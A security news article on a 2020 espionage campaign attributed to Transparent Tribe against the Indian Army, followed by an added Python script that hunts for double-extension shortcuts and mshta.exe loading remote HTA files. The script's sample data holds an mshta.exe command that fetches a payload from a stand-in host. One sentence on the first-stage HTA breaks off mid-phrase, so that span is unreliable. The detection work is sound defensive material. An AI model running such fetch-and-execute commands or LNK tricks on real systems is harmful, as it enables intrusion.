Researchers Uncover Cyber Espionage Operation Aimed At Indian Army (Security News, September 2020)
The campaign's starting point is an email carrying a malicious attachment, either a ZIP archive containing an LNK (Windows shortcut) file or a Microsoft Word document, that kicks off a multi-step infection chain ending in the download of the final-stage payload. The researchers identified three distinct infection chains. Notably, one of them combined template injection with the Microsoft Equation Editor flaw, a 20-year-old memory corruption bug in a legacy Microsoft Office component that, when exploited successfully, lets attackers execute arbitrary code on a vulnerable machine without macros or any user interaction beyond opening the document.
What's more, the LNK files carry a double extension and a document icon, tricking an unsuspecting victim into opening what looks like an ordinary document.
Once opened, the LNK files abuse the legitimate Windows binary "mshta.exe" to execute malicious HTA files hosted on fraudulent websites; the HTA files were generated with CACTUSTORCH, an open-source payload generation tool.

A Multi-stage Malware Delivery Process
The first-stage HTA file includes a decoy document and a malicious.
Although the convention used to name the DLL files resembles that of the SideWinder group, the APT's heavy reliance on open-source tooling and an entirely different C2 infrastructure led the researchers to conclude with reasonable confidence that the threat actor is of Pakistani origin, specifically the Transparent Tribe group, which has recently been linked to several attacks targeting Indian military and government personnel.
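The LNK-to-mshta.exe stage described above leaves two observable traces on an endpoint: a shortcut whose name ends in a document extension followed by .lnk being written to disk, and mshta.exe being launched by explorer.exe with a remote URL on its command line. The following is an added hunting example, not code from the original article or from the researchers it cites; the events are constructed to resemble Sysmon Event ID 11 (file create) and Event ID 1 (process create) records, and the field names, hostnames and file names are assumptions made for illustration only.

```python
"""Hunt for the LNK -> mshta.exe -> remote HTA chain in Sysmon-like telemetry.

Added example; not code from the original article or the cited research.
Event shapes, paths and hostnames below are assumptions for illustration.
"""
import re
from pathlib import PureWindowsPath

# Inner extensions an attacker pairs with a document icon to disguise a shortcut.
DOCUMENT_EXTS = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx",
                 ".txt", ".jpg", ".png"}
# Outer extensions that actually execute when the file is double-clicked.
EXEC_EXTS = {".lnk", ".exe", ".scr", ".hta", ".js", ".jse", ".vbs", ".vbe",
             ".cmd", ".bat"}
# Parents a user-opened shortcut or document would launch mshta.exe from.
USER_FACING_PARENTS = {"explorer.exe", "cmd.exe", "powershell.exe", "wscript.exe",
                       "cscript.exe", "winword.exe", "excel.exe", "outlook.exe"}

REMOTE_RE = re.compile(r"(?i)\b(?:https?|ftp)://\S+|\\\\[^\\\s]+\\\S+")  # URL or UNC path
INLINE_SCRIPT_RE = re.compile(r"(?i)\b(?:javascript|vbscript):")       # mshta javascript:...


def has_double_extension(filename):
    """True for names like 'Orders.pdf.lnk': a document-looking inner extension
    hidden behind an executable outer one. Explorer hides the last extension
    by default, so the victim sees 'Orders.pdf' next to a PDF icon."""
    suffixes = [s.lower() for s in PureWindowsPath(filename).suffixes]
    return (len(suffixes) >= 2
            and suffixes[-1] in EXEC_EXTS
            and suffixes[-2] in DOCUMENT_EXTS)


def is_suspicious_mshta(event):
    """Return the reasons a process-creation event matches the mshta.exe stage
    of the chain; an empty list means the event looks benign."""
    image = PureWindowsPath(event.get("Image", "")).name.lower()
    if image != "mshta.exe":
        return []
    cmd = event.get("CommandLine", "")
    parent = PureWindowsPath(event.get("ParentImage", "")).name.lower()
    reasons = []
    if REMOTE_RE.search(cmd):
        reasons.append("mshta.exe loading an HTA from a remote URL or UNC path")
    if INLINE_SCRIPT_RE.search(cmd):
        reasons.append("inline script passed to mshta.exe on the command line")
    if parent in USER_FACING_PARENTS:
        reasons.append(f"mshta.exe launched by {parent}, consistent with a user opening a shortcut")
    return reasons


def hunt(events):
    """Apply the matching check to each Sysmon-like event (ID 11 = file create,
    ID 1 = process create). Returns a list of (event index, reason) hits."""
    hits = []
    for i, ev in enumerate(events):
        if ev.get("EventID") == 11:
            name = PureWindowsPath(ev.get("TargetFilename", "")).name
            if has_double_extension(name):
                hits.append((i, f"double-extension file written: {name}"))
        elif ev.get("EventID") == 1:
            for reason in is_suspicious_mshta(ev):
                hits.append((i, reason))
    return hits


# Constructed sample telemetry (not real records): one malicious shortcut drop,
# one malicious mshta.exe launch, one benign vendor installer using a local HTA,
# and one ordinary document download.
SAMPLE_EVENTS = [
    {"EventID": 11, "Image": r"C:\Windows\explorer.exe",
     "TargetFilename": r"C:\Users\victim\Downloads\Defence_Orders.pdf.lnk"},
    {"EventID": 1, "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r"C:\Windows\System32\mshta.exe http://decoy.invalid/stage1.hta",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r'"C:\Windows\System32\mshta.exe" "C:\Program Files\Vendor\setup.hta"',
     "ParentImage": r"C:\Program Files\Vendor\setup.exe"},
    {"EventID": 11, "Image": r"C:\Windows\explorer.exe",
     "TargetFilename": r"C:\Users\victim\Downloads\quarterly_report.docx"},
]

if __name__ == "__main__":
    for index, reason in hunt(SAMPLE_EVENTS):
        print(f"event {index}: {reason}")
```

The two signals are deliberately kept independent: the file-name check fires when the archive is extracted, before anything runs, and the process check fires regardless of how the shortcut was named. mshta.exe does appear in some legitimate administrative scripts, so the parent-process list is the knob to tune for a given environment, and a hit that combines a remote URL with an explorer.exe parent should be weighted far higher than either reason on its own.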
News URL: http://feedproxy.google.com/~r/TheHackersNews/~3/LoOxwj96Dpo/cyberattack-indian-army.html